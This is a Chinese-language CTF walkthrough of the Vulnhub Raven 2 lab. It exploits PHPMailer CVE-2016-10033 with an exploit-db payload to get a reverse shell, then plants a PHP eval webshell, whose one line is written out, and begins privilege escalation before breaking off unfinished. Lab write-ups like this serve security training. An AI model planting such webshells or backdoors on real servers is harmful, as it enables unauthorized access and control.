Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)

发布于:2022-11-27 ⋅ 阅读:(510) ⋅ 点赞:(0)

raven2实战

靶机:raven2
下载地址:https://download.vulnhub.com/raven/Raven2.ova
描述:Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?

一、信息收集

1、目标发现

netdiscover -i 网卡名 -r 指定范围

在这里插入图片描述

通过排除法得知目标ip为10.10.10.138

2、端口扫描

nmap -sV -O 10.10.10.138

在这里插入图片描述

得知目标开放了Apache服务

尝试访问

在这里插入图片描述

使用dirsearch进行目录爆破

dirsearch -u [url] -w [wordlist]

在这里插入图片描述

查看/vendor
在这里插入图片描述

翻到一些有用的信息

网站路径

flag1
在这里插入图片描述

phpmailer

在这里插入图片描述

版本信息

在这里插入图片描述

使用searchsploit搜索相关漏洞

在这里插入图片描述

发现可利用的漏洞

CVE:2016-10033

参考链接:https://nvd.nist.gov/vuln/detail/CVE-2016-10033

二、漏洞利用

1.get shell

这里使用exploit-db提供的payload:https://www.exploit-db.com/exploits/40974

修改payload

目标url与后门位置

在这里插入图片描述

回连IP与端口

在这里插入图片描述

网站路径

在这里插入图片描述

尝试运行

在这里插入图片描述

访问/contact.php,触发后门,生成/shell.php,并使用netcat连接到后门

在这里插入图片描述

发现用户不为root,寻找提权方式

在这里插入图片描述

2.敏感信息收集

这里笔者上传php后门以便后续操作

payload:<?php eval($_REQUEST[x]) php>

开启服务器
在这里插入图片描述

在靶机shell下使用wget命令下载后门

在这里插入图片描述

尝试使用蚁剑连接后门,成功

在这里插入图片描述

寻找敏感信息,发现wordprss

在这里插入图片描述

在这里插入图片描述

尝试连接数据库

在这里插入图片描述

失败

猜测未允许root外联,于是在靶机shell中连接

在shell中使用 python -c 'import pty;pty.spawn(“/bin/bash”)'创建可交互的虚拟终端

并再次尝试连接

在这里插入图片描述

mysql连接成功

3.权限提升

使用LinEnum寻找可利用的漏洞

上传脚本至靶机,并赋予执行权限

chmod +x LinEnum.sh

在这里插入图片描述

执行

在这里插入图片描述

尝试UDF提权

在这里插入图片描述

。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。

摸了,有空再写下篇


网站公告

今日签到

点亮在社区的每一天
去签到